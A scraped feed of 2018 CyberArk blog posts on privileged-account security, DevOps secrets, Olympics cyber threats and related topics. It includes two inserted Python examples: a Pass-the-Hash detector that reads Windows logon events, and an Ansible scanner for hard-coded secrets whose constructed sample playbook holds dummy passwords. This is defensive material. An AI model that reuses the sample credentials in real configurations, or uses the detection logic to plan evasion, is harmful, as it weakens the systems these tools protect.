Ultimately, it’s important to understand that DevOps doesn’t have a full picture view of security. They primarily think about software vulnerability and patch management as the “scope of their security function.” To test this, you can ask them which security tools they use.  They will likely say, “Terraform, GitHub, Ansible, etc.” They are only looking at patches and vulnerabilities. They aren’t looking at access control and privilege associated with their access to tier zero assets. They aren’t thinking about secrets management.

Sure, DevOps made patching Heartbleed easier, but it didn’t prevent the Uber breach, because the “security tool” that was ultimately compromised was the source of the breach. The rest of the toolchain has the same problem. Think about it: I phish one DevOps tool, and I own your systems.

It’s time to either bring in the security teams to help secure your toolchain or start thinking like an attacker.

]]>
2018 Winter Olympics: Citius, Altius, Fortius, Cyber Attacks? https://www.cyberark.com/blog/2018-winter-olympics-citius-altius-fortius-cyber-attacks/ Mon, 12 Feb 2018 14:55:46 +0000 https://www.cyberark.com/?p=22253/

Only days into the Winter Olympics and reports of cyber attacks are making headlines. Officials have confirmed that a cyber attack is to blame for an internet and Wi-Fi shutdown during the opening ceremony.

Noncritical systems were impacted – including the official Olympics website, which according to reports, went offline when organizers shut down servers to address the attack. Wi-Fi service also stopped working.

This follows the Department of Homeland Security’s recent warning that the 2018 Winter Olympics will be a hotbed of cybercriminal activity. While the warning was extended to those in attendance, you don’t have to be sitting in the stands to become an unwitting target.

Whether they’re part of a criminal syndicate or part of a nation-state attack group, cyber attackers love to use high-profile public events as a cover for their malicious activity. Even the most security conscious person can let their guard down when they’re caught up in the spectacle and excitement of something like the Olympics.

With that in mind, here are a few techniques and approaches that we believe attackers will use during the Olympics, both to target spectators on-site and those watching and reading about the Olympics at home or from the office.

Cryptomining

Cryptomining attacks are quickly replacing ransomware as the attacks du jour. Attackers will infect websites that are commonly used to view Olympic activity, stream events or provide news on what’s happening at the games.

By visiting an infected site, users unwittingly donate their computing power resource to mine cryptocurrency on behalf of the attacker – all without users knowing they were part of the process.

These attacks don’t require malware to run on the user’s endpoint. The only indication of the attack may be that your computer runs slower due to loss of computing power.

We’ll dig into crypto-attacks more in a subsequent blog post.
High Value Targets: Olympic viewers back home or in the office

Spear Phishing Campaigns

This is one of the most common methods attackers use to gain a foothold on an endpoint or in an organization. Attackers use peoples’ information to specifically target them with a malicious email, in hopes that they’ll click a link and unleash the payload it’s carrying.

There are already reports that attackers have been targeting Olympic officials for months. Whether you’re watching the games from home or attending, be wary of any email that contains links or attachments to information about events, times and websites to watch the games. Vigilance is the best defense against phishing attacks.
High Value Targets: Olympic athletes, Olympic officials, country delegations and government representatives, viewers/fans

IoT and Mobile Payment Attacks

Mobile payments and IoT promise to be a big part of the 2018 Winter Olympics. Internet-connected devices have been a favorite target of attackers over the past year, primarily because of the incredibly poor security of most IoT devices. We can expect attackers to test device defenses used during the Olympics – whether it’s cameras, wearables or any other device that will be gathering data on athletes, attendees and officials.

While mobile payments make life much easier for the consumer, the platforms have historically had poor security and represent a real threat to consumer security. Some of the more prevalent mobile payment attacks include spoofed mobile wallets, or malware on the phone itself, which will collect all of your data, passwords and other sensitive information.
High Value Targets: Fans/attendees, Olympic athletes, Olympic officials

Public Wi-Fi-Related Attacks

Public Wi-Fi-related attacks are an oldie and attacker favorite – something that has manifested in previous Olympics (or any public event where free Wi-Fi is provided).

These types of attacks are incredibly common – free Wi-Fi is typically poorly secured. It’s fairly easy for attackers to use Wi-Fi sniffing software to ferret out the data transmitted over the network. This becomes worrisome when you use public Wi-Fi for sensitive transactions like banking or even entering passwords to websites.

If you’re at the games, be extra careful about which network you’re connecting to, and try to avoid accessing websites where you need to enter your passwords or sensitive information (like Social Security numbers), as well as banking/financial websites.

In addition to these recommendations, visitors should also consider using a mobile hotspot for Wi-Fi access.
High Value Targets: Olympic athletes, fans in attendance

]]>
Feels like a Cyber Security Groundhog’s Day https://www.cyberark.com/blog/feels-like-cyber-security-groundhogs-day/ Fri, 09 Feb 2018 14:44:14 +0000 https://www.cyberark.com/?p=22167/

While nobody has a crystal ball for what’s coming this year, I think we can all agree tough security lessons were learned in 2017. From Yahoo indicating that every one of its 3 billion email accounts (that’s a B) was exposed in a breach, to some pretty serious hacking tools believed to have been developed by the NSA. Additionally, we saw the WannaCry, NotPetya and BadRabbit ransomware families make everyone aware of how important it is to update your operating system and key applications, along with a strategy that mitigates risks from a diverse, targeted and motivated set of attackers. In short, the guidance here would not be much different from the last few years on what to do to help prevent these attacks. This should give us a sense of pause – are we in some sort of a Cyber Security Groundhog’s Day where we keep repeating the same old thing?

How much wood can a Cyber wood chuck, chuck if a….

So at the risk of sounding like a broken record, I want to restate something that you have heard from CyberArk. Privilege is an endpoint problem, and it is solvable. Privileged account security is something that should be properly handled alongside other security hardening and defense-in-depth strategies. We have been saying this for a long time, but it’s great to see other vendors make this argument too. The analyst community also notes this as a key tenet of a defensive strategy.

Along with privileged account security, and this means effortlessly implementing the principles of Least Privilege (coincidentally in the top 5 Critical Cyber Controls advocated by the Center for Internet Security to reduce the attack surface), we see two other critical areas we featured in our recent release: application control and credential theft protections.

Application control is something we have discussed previously. Coupling this with Ransomware policy automation, customers that leverage Endpoint Privilege Manager are able to quickly insulate their environments from one of the biggest plagues of 2017 in very aware ransomware (say that 10 times fast). While some look at app control as passé, the reality is that there is more than a “give and take” that happens when properly implemented. I like to look at it as “help me to help you.” CyberArk has many large customers leveraging this capability across multi-national organizations with different levels of control that enable their respective businesses to operate at peak efficiencies. The result: instead of chasing down instability issues, CyberArk Endpoint Privilege Manager customers can focus more energies on the important matters of the business.

Now available to all deployments of Endpoint Privilege Manager is CyberArk Application Risk Analysis (ARA) service. This service enables IT security analysts to make timely decisions around policy for unknown applications that enter their environments. ARA combines machine learning, to identify risky applications, with several layers of malware identification to arrive at a risk score for an unknown application. The key benefit is to enable unknown applications to be properly handled by policy.

Watch this video to see CyberArk Application Risk Analysis in action:


“Do you ever have déjà vu, Mrs. Lancaster?”

As it’s been said many times by analysts and the industry as a whole, attackers target the credentials of a privileged or administrative user to achieve their objectives. At CyberArk this hits home, since controlling privilege is the name of the game. Having preventative measures to keep the bad guys out (i.e. not getting on the endpoint in the first place) is really an arms race that several Cyber Security companies embark upon. Eventually, the bad guys will get on your endpoint, and most agree it is inevitable, thus the change in tone and posture to not simply focus on prevention but also detection.

Once inside, it’s what happens next that matters most. This usually means attacks on the environment directly as the user (if, say, for example, they are operating with administrative permissions, which our application control does a great job interrupting) or, in many cases nowadays, stealing an admin credential or residual privilege on the endpoint from a prior login.

“Thinking like an attacker” enables CyberArk Endpoint Privilege Manager to help when the bad guys get around your NGAV or EDR solution, providing a means to contain their activities to the endpoint via credential theft protection. CyberArk credential theft protection leads the industry with the most diverse coverage of theft detection and blocking across every Windows OS credential store and every browser-based credential store, and also includes local AWS secret keys residing on the endpoint. Keeping the bad guys from stealing a privileged credential often means that they are unable to escalate privilege to pivot onto more sensitive systems. In many cases, this sufficiently deters or outright breaks the attack chain, allowing your incident response teams to clean up the infiltration on the endpoint.

To help ensure the outcomes are as described, Endpoint Privilege Manager ships with protections across Local Security Authority Subsystem Service (LSASS), Security Account Manager (SAM), Domain Credentials Cache (msvcachedv2), the Local Security Authority (LSA), Safe Mode turning off Microsoft’s Virtual Secure Module (VSM), Microsoft Vault as well as Internet Explorer, Chrome and Firefox browser threats that aim to steal stored credentials. Various remote access tools such as WinSCP and mRemoteNG are protected as well since they retain local cached credentials. This lateral movement protection helps to keep your organization safe from Golden Ticket and Golden SAML attacks.

Keep on trolling

With 2018 looking like we are heading toward another Cyber Security Groundhog’s day, don’t let yourself repeat last year and cause grave impact to your systems. Look to control privilege on your endpoints and take proactive steps to control applications and the threat of ransomware. Take CyberArk ARA out for a spin all while keeping the privileged credentials you do use, safe. Now that’s a happy ending I think we can all agree on.

To help get you on the right path, contact us today to get a DNA Scan of your environment and see where privilege is hiding.

]]>
What Super Bowl LII Ads Can Teach You about Privileged Account Security https://www.cyberark.com/blog/super-bowl-lii-ads-can-teach-privileged-account-security/ Mon, 05 Feb 2018 18:08:34 +0000 https://www.cyberark.com/?p=21946/

It is the day after Super Bowl LII, and sadly, Patriots fans did not wake up savoring the good feeling of their sixth Super Bowl win with Tom Brady. In our household, there is now a temporary ban on sports radio until talk of this Super Bowl dies down over the airwaves.

Although the game was a big disappointment for Patriots players and fans alike, this year’s Super Bowl ads delivered some fun and entertainment. As I sip my morning coffee, I’m recalling some of my favorite and least favorite ads of Super Bowl LII and drawing parallels between them and cyber security—privileged account security in particular.

So let’s start with (arguably) my least favorite ads of this Super Bowl. One was the Intuit TurboTax ad, which featured a poorly animated creature hiding under the bed. The other ad featured a Casper-like ghost hiding in the attic, which played much better. The main message of both ads was that U.S. tax payers should not fear or delay filing their taxes. Instead, they should get started now with the friendly assistance of TurboTax’s experts.

And how might this Super Bowl ad relate to privileged account security, you ask? Security teams also face hard deadlines and often feel overwhelmed trying to “get it all done.” Some organizations delay moving forward with a comprehensive privileged account security program because they don’t know where to begin. But just like April 15 and the “tax man who cometh,” infrastructure and applications will get breached, so it’s essential to proactively mitigate the risks associated with privileged accounts and credentials—whether the risks come from human error, malicious insiders or external attackers.

Security teams don’t have to wait until the proverbial April 14 to get started; a good resource to consider is CyberArk’s CISO View report titled, “Rapid Risk Reduction: A 30-Day Sprint to Protect Privileged Credentials.” This report provides an inside look at the lessons learned from several high-profile data breaches and offers a proven framework for an intensive sprint of approximately 30 days to implement a set of controls around privileged credentials.

But what about the best Super Bowl LII ads? Can we learn anything about privileged account security from these as well? But of course!  My top three favorite ads were Fire and Ice for Doritos and Mt. Dew, Amazon’s Alexa gets some new voices, and the NFL ad featuring Eli Manning and Odell Beckham’s “Dirty Dancing.”  Although the Alexa ad has some obvious cyber security angles (who hasn’t read stories about the “what ifs” of your smart home devices getting hacked), I am going to explore the privileged account security connections of the Manning and Beckham ad instead.

Now the connection to privileged account security for this ad is a tad more subtle than the TurboTax ad. This ad made me think about the organizational issues that sometimes get in the way of companies moving forward with any type of cyber security program, whether privileged account security-related or otherwise. Instead of the harmonious flow of Beckham and Manning and the rest of the team dancing in the background, organizations often let discord between the different parts of the company (security, IT operations, DevOps and developers) get in the way of tackling the security risks that they know are out there and need to be addressed. The consequences of not addressing these risks are, of course, far more serious than a missed touchdown pass or the sack that sealed the Patriots’ defeat at the end of the game.

So, what was your favorite Super Bowl LII ad and why? Let us know via Twitter @CyberArk or @kcmestre.

]]>
New Research Paper: Pass-the-Hash Detection https://www.cyberark.com/blog/new-research-paper-pass-hash-detection/ Fri, 02 Feb 2018 22:19:56 +0000 https://www.cyberark.com/?p=21906/

CyberArk Labs recently published a preview of research on our Threat Research Blog exploring ways to detect Pass-the-Hash (PtH) attacks using the Windows Event Viewer. As a follow-up to the highly referenced post, the Labs team has published a technical research paper with additional details on the technique. The new paper is available for download here.

As a refresher, PtH is an attack technique that leverages stolen credentials. It is often used in sophisticated attacks and represents a significant risk to organizations. This technique involves an attacker stealing account credentials from one computer and using them to authenticate to other access points in a network. Instead of requiring plaintext passwords, PtH attacks allow the attacker to authenticate with password hashes and begin lateral movement in the network over the NTLM protocol.

As part of this research, the Labs team evaluated a number of scenarios for NTLM connections, including PtH ones, to pinpoint key indicators and to help distinguish between legitimate and illegitimate uses. Based on this exercise, the team designed an algorithm and an open source tool (called Ketshash) to aid in detecting live PtH attempts. You can also watch a short demo video of Ketshash here.
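To make the detection idea concrete, here is an added example that is not part of the post and not the Ketshash algorithm itself: it applies one simplified, assumed heuristic to constructed Windows Security log lines. The assumption is that a user who genuinely works from a workstation produced an interactive logon (type 2, 10 or 11) on that workstation shortly before any NTLM network logon (type 3) elsewhere that names the workstation as its source; an NTLM logon with no such preceding session is flagged. The flattened one-line event format, the host names, the user names and the 10-hour window are all constructed for the example.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed sample of Security log 4624 (successful logon) events, flattened to
# one line each. Real events carry these values in fields such as LogonType,
# AuthenticationPackageName, TargetUserName and WorkstationName/IpAddress.
SAMPLE_LOG = """
2018-02-01T08:00:00 host=WS01 EventID=4624 LogonType=2 AuthPkg=Kerberos User=alice      Source=WS01
2018-02-01T09:00:00 host=FS01 EventID=4624 LogonType=3 AuthPkg=NTLM     User=alice      Source=WS01
2018-02-01T09:30:00 host=DC01 EventID=4624 LogonType=3 AuthPkg=NTLM     User=admin_bob  Source=WS07
2018-02-01T09:31:00 host=DC01 EventID=4624 LogonType=3 AuthPkg=Kerberos User=svc_backup Source=APP02
2018-02-01T19:30:00 host=FS01 EventID=4624 LogonType=3 AuthPkg=NTLM     User=alice      Source=WS01
"""


@dataclass
class LogonEvent:
    time: datetime
    host: str        # computer that recorded the event
    event_id: int
    logon_type: int
    auth_pkg: str
    user: str
    source: str      # workstation the logon request came from


def parse_log(text: str) -> List[LogonEvent]:
    """Parse the constructed key=value line format into LogonEvent records."""
    events = []
    for line in text.strip().splitlines():
        parts = line.split()
        kv = dict(p.split("=", 1) for p in parts[1:])
        events.append(LogonEvent(
            time=datetime.fromisoformat(parts[0]),
            host=kv["host"],
            event_id=int(kv["EventID"]),
            logon_type=int(kv["LogonType"]),
            auth_pkg=kv["AuthPkg"],
            user=kv["User"],
            source=kv["Source"],
        ))
    return events


# Assumed heuristic (not the published Ketshash algorithm): an NTLM network logon
# is expected to be preceded, on its source workstation, by an interactive logon
# of the same user within LEGIT_WINDOW. Both values are illustrative.
INTERACTIVE_TYPES = {2, 10, 11}
LEGIT_WINDOW = timedelta(hours=10)


def find_suspicious_ntlm(events: List[LogonEvent]) -> List[LogonEvent]:
    """Return NTLM network logons that lack a recent interactive session on their source host."""
    legit: Dict[Tuple[str, str], List[datetime]] = {}
    for e in events:
        if e.event_id == 4624 and e.logon_type in INTERACTIVE_TYPES:
            legit.setdefault((e.host.lower(), e.user.lower()), []).append(e.time)

    flagged = []
    for e in events:
        if e.event_id != 4624 or e.logon_type != 3 or e.auth_pkg.upper() != "NTLM":
            continue
        sessions = legit.get((e.source.lower(), e.user.lower()), [])
        if not any(e.time - LEGIT_WINDOW <= t <= e.time for t in sessions):
            flagged.append(e)
    return flagged


if __name__ == "__main__":
    for e in find_suspicious_ntlm(parse_log(SAMPLE_LOG)):
        print(f"{e.time.isoformat()} NTLM logon of {e.user} to {e.host} from {e.source}: "
              f"no recent interactive session on {e.source}")
```

On the sample, alice’s 09:00 file-server logon is accepted because she logged on to WS01 at 08:00, while admin_bob’s logon to DC01 from WS07 (no interactive session there at all) and alice’s 19:30 logon (outside the window) are flagged. In a real environment this needs the source workstation’s own 4624 events to be collected centrally, and service accounts and scheduled tasks that legitimately use NTLM without interactive sessions will need an allow list or a different rule.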

]]>
How to Achieve Sustained Success for Your Privileged Account Security Program https://www.cyberark.com/blog/achieve-sustained-success-privileged-account-security-program/ Tue, 30 Jan 2018 17:52:31 +0000 https://www.cyberark.com/?p=21829/

Many organizations have embarked upon a cyber security “sprint” in order to significantly reduce their privileged account attack surface. The sprint—designed to yield initial results in just 30 days—focuses on prioritizing the implementation of core controls to protect an organization’s most powerful and vulnerable accounts.

Bolstered by sprint-driven successes and momentum, it’s time for organizations to gear up for the next leg of their security program. They need to turn their “sprint” into a longer-term, sustainable cyber security program.  As part of the journey, security teams often have questions about the best path forward. For example, they ask:

  • “How do we choose different workflows and controls to implement?”
  • “How do we risk rank them?”
  • “What does an ideal state of security look like?”
  • “How do we track and measure success or even support the program from a people perspective?”

Let’s focus on two fundamental elements for a successful, long-term program. The goal is to significantly reduce the risk of privileged credential theft. Keeping the attack pathway in mind, you want to shut down access to credentials and minimize what attackers can do with any credentials that are exposed. Ideally, you also limit how far attackers or malicious insiders can move within the organization using a specific set of credentials.

One: Increase the Coverage of Privileged Account Security Controls across the Organization

During the “sprint,” organizations focus on protecting their most powerful accounts first. This typically includes steps such as isolating and monitoring access to domain controllers and member computers, implementing multi-factor authentication to protect high-risk privileged credentials, eliminating unnecessary accounts and privileges, and establishing credential boundaries.

During the next leg of the journey, the focus shifts to scale—the implementation of basic credential management and session isolation for human user accounts across as many technologies as possible—while minimally impacting end user experience and productivity. These include accounts linked to Unix devices, databases, network devices and built-in back door IDs. These are very powerful accounts. They exist in every system, yet they’re not typically used on a day-to-day basis by end users. Organizations can move quickly to implement change and showcase demonstrable wins while causing the least disruption possible.

Two: Create an In-Depth Layer of Controls within the Riskiest Assets in the Environment

When it comes to analyzing the risk of a particular work stream (defined as the combination of a particular platform and an account type), it’s important to take three key things into consideration. We sometimes refer to this as a “privilege triad”:

  • The scope of influence: How many different assets can I affect with a single privileged account? What can this access? Does it cross different network boundaries?  Does it cross different risk tiers?  Who currently has access to these IDs?
  • Level of privilege: How much can I do with a given privileged account once I hit a system? How are we granting privilege in the first place, and can we granularly control it?
  • Ease of compromise: What controls do I have, or lack, today within my environment for this particular work stream? Do people actually know about these credentials directly? Are they using them from their workstations? Are we rotating them? What sort of underlying vulnerabilities might exist within this particular technology to begin with?

This “privilege triad” can be used to evaluate any environment or work stream within an organization. Art Chaisiriwatanasai of KPMG shared a great example of how his company uses similar classification and risk-rating mechanisms to pinpoint high-risk assets in his CyberArk guest blog, Privileged Access Management: A Matrix Approach for Account Ranking and Prioritization.

To explore these control sets further, check out this short video that outlines three primary phases our solutions engineering team often recommends for improving privileged account security.

]]>
Malware, Mistakes and Meaningful Measures to Protect Critical Infrastructure https://www.cyberark.com/blog/malware-mistakes-meaningful-measures-protect-critical-infrastructure/ Thu, 25 Jan 2018 17:21:14 +0000 https://www.cyberark.com/?p=21714/

Security and industry experts have long advocated for the need to increase the protection of critical infrastructure – including transportation systems, energy and utilities providers, and financial services. The implications of an attack on our nation’s systems are far reaching – from disrupting delivery of key services to impacting public safety.

Just recently, researchers presented an analysis of Triton, a malware used in the third ever recorded cyber attack against industrial equipment. Findings indicate that the malware was able to enter the plant via an exploit in “security procedures that allowed access to some of its stations as well as its safety control network.” Additionally, recent erroneous alerts regarding missile strikes caused panic in Hawaii and Japan – each alleged to be the result of human error. These incidents shine an important light on the cyber security procedures used to safeguard these critical systems – from external attackers or insiders, whether intentional or not.

From an attacker’s perspective, whether they have already compromised the network or are targeting a specific mission-critical objective, their TTPs (tactics, techniques and procedures) will include getting access to privileged accounts to achieve their ultimate goal.

Historically, we’ve seen situations where the software and systems used to run critical infrastructure were compromised through shared privileged accounts and default passwords that hadn’t been changed. These hardcoded passwords are static and can be guessed or brute forced by attackers. Once attackers gain access to privileged accounts, they can gain full control of the system.

In past attacks on similar systems, the attackers used this access to emergency communications for ‘prank attacks,’ such as the case in Montana in 2013 where a zombie outbreak was broadcast to residents. In light of the severity and panic-inducing nature of the recent erroneous emergency reports, these former ‘prank attacks’ take on a more ominous outlook in demonstrating the destructive potential of such false alerts.

These examples also provide insight into how malicious attackers could compromise sensitive systems and infrastructure, as well as the steps needed to protect them from outside attacks. This starts with identifying where privileged accounts exist, implementing stronger management of the credentials that provide access to and control over such critical infrastructure, and ensuring ongoing management and visibility into those accounts.

One Key and Five Minutes Can Leak Millions of Records https://www.cyberark.com/blog/one-key-five-minutes-can-leak-millions-records/ Fri, 19 Jan 2018 03:16:11 +0000 https://www.cyberark.com/?p=21459/

An explosion in the number of applications and machines throughout IT environments has made IT automation and configuration tools such as Ansible a necessity. This trend is related to the increased adoption of DevOps practices where the line between development and operations has been erased. DevOps automates the software delivery pipeline and utilizes innovative, robust tools to deploy environments, scripts and applications. Functions within traditional operations roles are being fully replaced by a machine. This includes using powerful secrets to access and control IT infrastructure. To achieve a faster go-to-market execution and improved ROI, IT admins have been known to store secrets in Ansible Playbooks.

Tools such as Ansible help to modernize IT environments, enabling applications to deploy faster with improved quality. These tools deliver simple IT automation that ends repetitive tasks and frees up DevOps teams for more strategic work. Within the DevOps tool chain, secrets are necessary to build today’s modern applications. Against security best practices, these secrets are frequently embedded directly into code or configuration files like Ansible Playbooks. When these tools or files are compromised, the secrets and the access they provide are also compromised, leaving organizations both large and small vulnerable to an attack.

Secrets embedded in code resulted in the Uber breach that was revealed in 2017. The global ride share company stored its AWS keys (one type of secret) in a code repository that attackers were able to pull and leverage to gain direct access to millions of unencrypted files containing personal information.

This is not an isolated incident. Attackers are proactive: they have bots crawling all over GitHub seeking secrets that were mistakenly published online. They do this because it has worked before. Many organizations continue to store secrets in code or configuration files, and finding the secrets within tools like Ansible, which control a very large number of tasks, can certainly be an uphill climb.

For years, the CyberArk Discovery and Audit™ (DNA) tool has provided organizations with the ability to first discover and later audit their environment. The tool automatically scans the network, which otherwise is a complex, manual process, for the following:

  • Data related to privileged and non-privileged accounts
  • Embedded and hard-coded application credentials
  • SSH key exposure
  • Potential credential theft risks, including Pass-the-Hash attacks, Pass-the-Ticket and Overpass-the-Hash

The easy-to-use scanner automatically discovers and analyzes privileged and non-privileged accounts, then generates a report and visual organizational maps that illustrate the privileged account security status in the organization.

CyberArk DNA now provides the ability to automate the discovery of hidden credentials within Ansible (e.g. Playbooks, Roles and Tasks). This improves and simplifies the security of CI/CD tools and provides CISOs with a powerful tool to help discover and understand the risks of hidden secrets within their DevOps environments. This integration further bolsters the partnership between CyberArk and Ansible. Recently, CyberArk Conjur joined forces with Ansible to build integrations that deliver off-the-shelf, automated secrets protection and best practices throughout the DevOps pipeline.

How it works 

CyberArk DNA will scan an entire network to detect Windows and Unix/Linux instances for privileged and non-privileged secrets. On Red Hat instances, CyberArk DNA can detect an Ansible installation and search for Playbook yml (YAML) files. Once a Playbook has been discovered, DNA will then search for hard-coded secrets in Roles, Tasks and variables within a Playbook.

Figure 1. The CyberArk DNA dashboard provides a high-level review of all embedded and hard-coded credentials found on application servers including Ansible servers

At the end of the scan, DNA lists the details of every discovered secret (e.g. user name, file location and password length) in a report and summarizes them in an easy-to-consume format that can be shared with managers and executives to give them an overview of the current state of the domain.
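To make the scan described above concrete, here is an added example scanner that is not CyberArk DNA's code and does not reproduce its detection rules. It walks Playbook text (vars, roles and tasks alike), flags credential-looking keys whose value is a literal rather than a Jinja2 reference, a lookup or an Ansible Vault blob, and reports file location, associated user name and password length without ever printing the secret itself, which is the shape of the report described above. The credential key list and the sample playbook are constructed for the example.

```python
"""Added example: a minimal scanner for hard-coded secrets in Ansible YAML.

Not CyberArk DNA's code. The key list, the heuristics and the sample
playbook below are constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Keys treated as credentials (assumption: a starter list, not DNA's rules).
SECRET_KEY_RE = re.compile(
    r"^\s*(?:-\s*)?(?P<key>[A-Za-z0-9_.]*"
    r"(?:password|passwd|secret|token|api_key|access_key|private_key)"
    r"[A-Za-z0-9_]*)\s*:\s*(?P<value>.+?)\s*$",
    re.IGNORECASE,
)
# Keys that name the account a nearby secret belongs to.
USER_KEY_RE = re.compile(
    r"^\s*(?:-\s*)?(?P<key>[A-Za-z0-9_.]*(?:user|username|login))\s*:\s*(?P<user>\S+)\s*$",
    re.IGNORECASE,
)

# Constructed playbook: two hard-coded secrets, one templated lookup, one vaulted value.
SAMPLE_PLAYBOOK = """\
---
- name: Provision database host (constructed example)
  hosts: db
  vars:
    db_user: app
    db_password: Sup3rS3cret!        # hard-coded: should be flagged
    api_token: "{{ lookup('env', 'API_TOKEN') }}"   # templated: fine
    vault_password: !vault |
      $ANSIBLE_VAULT;1.1;AES256
      6162636465666768
  tasks:
    - name: Create schema
      mysql_user:
        login_user: root
        login_password: root123       # hard-coded: should be flagged
        name: app
"""


@dataclass
class Finding:
    path: str
    line: int
    key: str
    user: Optional[str]
    secret_length: int   # reported instead of the secret value itself


def is_literal(value: str) -> bool:
    """A literal is anything that is not templated, vaulted or looked up."""
    v = value.strip().strip("\"'")
    if not v:
        return False
    if v.startswith("{{") or v.startswith("!vault") or "lookup(" in v:
        return False
    return True


def scan_text(path: str, text: str) -> List[Finding]:
    """Scan one YAML file's text; the most recent user-ish key is attached to each finding."""
    findings: List[Finding] = []
    current_user: Optional[str] = None
    for lineno, raw in enumerate(text.splitlines(), start=1):
        if raw.lstrip().startswith("#"):
            continue
        # Drop a trailing YAML comment (whitespace followed by '#'); a secret
        # containing " #" would be truncated here, an accepted simplification.
        line = re.sub(r"\s+#.*$", "", raw)
        m_user = USER_KEY_RE.match(line)
        if m_user:
            current_user = m_user.group("user").strip("\"'")
            continue
        m = SECRET_KEY_RE.match(line)
        if m and is_literal(m.group("value")):
            secret = m.group("value").strip().strip("\"'")
            findings.append(Finding(path, lineno, m.group("key"), current_user, len(secret)))
    return findings


def summarize(findings: List[Finding]) -> dict:
    """Executive-style rollup: counts per file, no secret values."""
    per_file: dict = {}
    for f in findings:
        per_file[f.path] = per_file.get(f.path, 0) + 1
    return {"total": len(findings), "per_file": per_file}


if __name__ == "__main__":
    found = scan_text("playbooks/site.yml", SAMPLE_PLAYBOOK)
    for f in found:
        print(f"{f.path}:{f.line} key={f.key} user={f.user} password_length={f.secret_length}")
    print(summarize(found))
```

In a real deployment the same `scan_text` would be run over every `.yml` file under the Playbook, Roles and group/host vars directories; reporting only the length of the secret keeps the findings report itself from becoming a new place where credentials leak.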

Figure 2. From the DNA executive report data, a summary of all credentials found on all Playbooks from all scanned Ansible servers

Take the first step in discovering secrets within your DevOps pipeline

Interested in discovering hidden, unprotected credentials in your Ansible Playbooks? Request a FREE risk assessment with CyberArk DNA or reach out to your local sales representative for more information. Also, find out more about permanently removing embedded secrets from scripts and code by visiting CyberArk Conjur and try it for FREE with the Community Edition.

15 Cyber Security Stats At-a-Glance https://www.cyberark.com/blog/15-cyber-security-stats-glance/ Tue, 16 Jan 2018 20:13:45 +0000 https://www.cyberark.com/?p=21367/

Last year, the world witnessed a barrage of crippling cyber attacks—from the unprecedented breach of a Credit Bureau that compromised personal data of 145 million consumers, to leaked government tools belonging to the NSA, to major ransomware campaigns including WannaCry, Bad Rabbit and NotPetya, to revelations that Yahoo’s breach included 3 billion accounts. Many of the most destructive cyber attacks in 2017 were executed by successfully exploiting privileged accounts. Unsecured privileged accounts give attackers access to your highest value assets and data.

As the attack surface continues to expand on pace with technological advancements, the threat will only increase without mitigation. Following is a list of 15 cyber security stats, curated from a number of industry sources, to help illustrate the current landscape and underscore the urgency of putting privilege first in 2018:

  1. By 2020: 4 billion people will be online, 50 billion devices will be connected to the internet and data volumes will be 50x greater than they were in 2016 (Source: Microsoft)
  2. Percentage of computer users who will click on a link from an unknown sender: 50 percent (Source: TechRepublic)
  3. Amount of money that ransomware victims have paid out over the past two years: $25 million (Source: The Verge)
  4. Global average cost of a data breach: $3.62 million (Source: IBM)
  5. Average cost for each lost or stolen record containing sensitive and confidential information: $141 (Source: IBM)
  6. Number of unfilled cyber security jobs by 2021: 5 million (Source: CSO Magazine)
  7. Average number of days attackers spend inside systems, undetected: 99 days (Source: FireEye)
  8. Percentage of organizations who admit to not fully informing customers when their personal data was compromised in a cyber attack: 50 percent (Source: CyberArk via Vanson Bourne)
  9. Percentage of security pros who say their organization can’t stop every attempt to break into their internal network: 46 percent (Source: CyberArk via Vanson Bourne)
  10. Percentage of boards that participate in the review of current security and privacy risks: 31 percent (Source: PwC)
  11. Percentage of business leaders who do not understand what they should do if a cyber security incident occurs: 52 percent (Source: CyberArk via Vanson Bourne)
  12. Organizations currently using cloud services: 93 percent (Source: McAfee)
  13. Organizations actively using containers today: 83 percent (Source: Forbes)
  14. Percentage of security and DevOps pros who failed to identify all places where privileged accounts or secrets exist: 99 percent (Source: CyberArk via Vanson Bourne)
  15. Percentage of security pros who report that their organization has not implemented a privileged account security solution for DevOps: 73 percent (Source: CyberArk via Vanson Bourne)
What do Cyber Professionals Teach Children about Security? https://www.cyberark.com/blog/cyber-professionals-teach-children-security/ Tue, 09 Jan 2018 15:30:41 +0000 https://www.cyberark.com/?p=21123/

Winter break is over, and children have returned to school armed with new phones, laptops and other devices. I witnessed the excitement of a pair of fifth graders receiving laptops for Christmas. I can’t recall what I wanted at that age—probably games or a bike—but surely a laptop wasn’t on my list.

I watched one sister help the other to set up her laptop. Her father set up hers first, and after he left the room, she decided she knew enough to help her sister. She paused the wizard once to ask me if they should accept the software update. These eleven-year-olds created their own login credentials, entered their home network password and quickly finished the set up process. I asked what they planned to do with their laptops. School work was the first answer, watching videos on YouTube followed, and then I zoned out because I was distracted by a moment of fear, considering all of the bad that comes with the good of having access to the internet.

My follow up questions focused on what they learned in school about cyber security. The answer—not that much, even in their upscale neighborhood elementary school. They have basic awareness with terms such as “attackers,” and they know not to share passwords, but the learning curve is steep. Parents have to take and maintain a leading role in cyber security education, and they also should establish guidelines and rules that can be followed / monitored. At the very least, like everything else in life, they need to provide enough information to help children make good, informed choices.

Obviously, there are many articles available to help parents inform children, but let’s face it, many adults don’t even understand or follow best practices. I couldn’t help but wonder, do parents who work in the cyber security industry do a better job of teaching children about cyber security best practices?

I asked a few of my colleagues about what they teach and what information they believe to be the most important. I was pleasantly surprised to learn that many of them volunteer as guest speakers on the subject at local schools.

From these conversations three themes stand out:

  • Privacy: The lives of children are documented in an unprecedented way considering the high volume of photos, selfies and other information that is shared online from a young age—often by parents who are thrilled to share every milestone. Explaining the concept and value of privacy is an important lesson. Children frequently use devices to share pictures, experiences, thoughts and more, so they have to learn there are lasting consequences – their digital profile builds over time with every action. Screenshots are just one way to extend the reach and shelf life of a message or image. Encourage them to think of examples of what they shouldn’t share including inappropriate pictures and potentially offensive posts.  Remind them everything is public. After all, there aren’t secrets online. It’s easy to make a mistake that might be irreversible and hurt many.
